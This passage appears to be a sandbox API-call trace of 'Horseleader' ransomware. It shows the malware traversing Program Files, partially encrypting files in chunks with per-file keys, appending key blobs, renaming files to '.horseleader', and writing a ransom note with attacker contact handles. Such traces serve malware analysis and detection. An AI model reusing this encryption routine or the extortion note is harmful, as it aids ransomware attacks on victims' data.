0x7dbfd8 [0250.491] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*") returned 56 [0250.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.492] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.492] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\.") returned 56 [0250.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.492] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.492] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\..") returned 57 [0250.493] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.493] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VGX.dll", cAlternateFileName="")) returned 1 [0250.493] lstrcmpiW (lpString1="VGX.dll", lpString2="Windows") returned -1 [0250.493] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned 62 [0250.493] StrStrIW (lpFirst="VGX.dll", lpSrch=".horseleader") returned 0x0 [0250.493] lstrcmpW (lpString1="VGX.dll", lpString2="#Decrypt#.txt") returned 1 [0250.493] lstrcmpW (lpString1="VGX.dll", lpString2="_uninstalling_.png") returned 1 [0250.493] lstrlenW (lpString=".testttjffg") returned 11 [0250.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll", lpSrch=".testttjffg") returned 0x0 [0250.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.495] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VGX.dll", cAlternateFileName="")) returned 0 [0250.495] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.495] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\#Decrypt#.txt") returned 68 [0250.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.496] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.496] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.497] lstrlenA (lpString="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") returned 1368 [0250.497] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.498] CloseHandle (hObject=0x21c) returned 1 [0250.498] GetProcessHeap () returned 0x780000 [0250.498] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.498] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0250.498] lstrcmpiW (lpString1="Visio Shared", lpString2="Windows") returned -1 [0250.498] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared") returned 63 [0250.498] lstrcmpW (lpString1="Visio Shared", lpString2=".") returned 1 [0250.498] lstrcmpW (lpString1="Visio Shared", lpString2="..") returned 1 [0250.498] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.498] GetProcessHeap () returned 0x780000 [0250.499] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.499] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*") returned 65 [0250.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.499] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\.") returned 65 [0250.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.500] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\..") returned 66 [0250.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0250.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.500] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Fonts", cAlternateFileName="")) returned 1 [0250.500] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0250.500] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts") returned 69 [0250.500] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0250.501] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0250.501] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.501] GetProcessHeap () returned 0x780000 [0250.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*") returned 71 [0250.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, 
dwReserved1=0xa8c03106, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\.") returned 71 [0250.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x8541dd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8541dd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="..", cAlternateFileName="")) returned 1 [0250.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\..") returned 72 [0250.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x4f2ea, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="BIGFONT.SHX", cAlternateFileName="")) returned 1 [0250.504] lstrcmpiW (lpString1="BIGFONT.SHX", lpString2="Windows") returned -1 [0250.504] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0250.505] StrStrIW (lpFirst="BIGFONT.SHX", lpSrch=".horseleader") returned 0x0 [0250.505] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.505] lstrcmpW (lpString1="BIGFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.505] lstrlenW (lpString=".testttjffg") returned 11 [0250.505] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.505] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.505] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.505] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0250.506] StrStrW (lpFirst="BIGFONT.SHX", lpSrch=".txt") returned 0x0 [0250.506] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=324330) returned 1 [0250.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.507] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.510] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.510] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.511] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x25175, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.511] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.513] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.513] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.513] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4a2ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.513] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.515] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.515] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.516] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.516] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.516] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.516] CloseHandle (hObject=0x1a4) returned 1 [0250.516] GetProcessHeap () returned 0x780000 [0250.516] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.517] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.horseleader") returned 93 [0250.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx.horseleader")) returned 1 [0250.518] GetProcessHeap () returned 0x780000 [0250.518] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.518] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81c076e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, 
ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xa261d, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="CHINESET.SHX", cAlternateFileName="")) returned 1 [0250.518] lstrcmpiW (lpString1="CHINESET.SHX", lpString2="Windows") returned -1 [0250.518] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0250.518] StrStrIW (lpFirst="CHINESET.SHX", lpSrch=".horseleader") returned 0x0 [0250.518] lstrcmpW (lpString1="CHINESET.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.518] lstrcmpW (lpString1="CHINESET.SHX", lpString2="_uninstalling_.png") returned 1 [0250.518] lstrlenW (lpString=".testttjffg") returned 11 [0250.518] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX", lpSrch=".testttjffg") returned 0x0 [0250.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0250.520] StrStrW (lpFirst="CHINESET.SHX", lpSrch=".txt") returned 0x0 [0250.520] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=665117) returned 1 [0250.520] SetFilePointerEx 
(in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.520] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.523] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.523] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.524] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x4eb0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.524] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9d61d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.527] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.529] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.530] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, 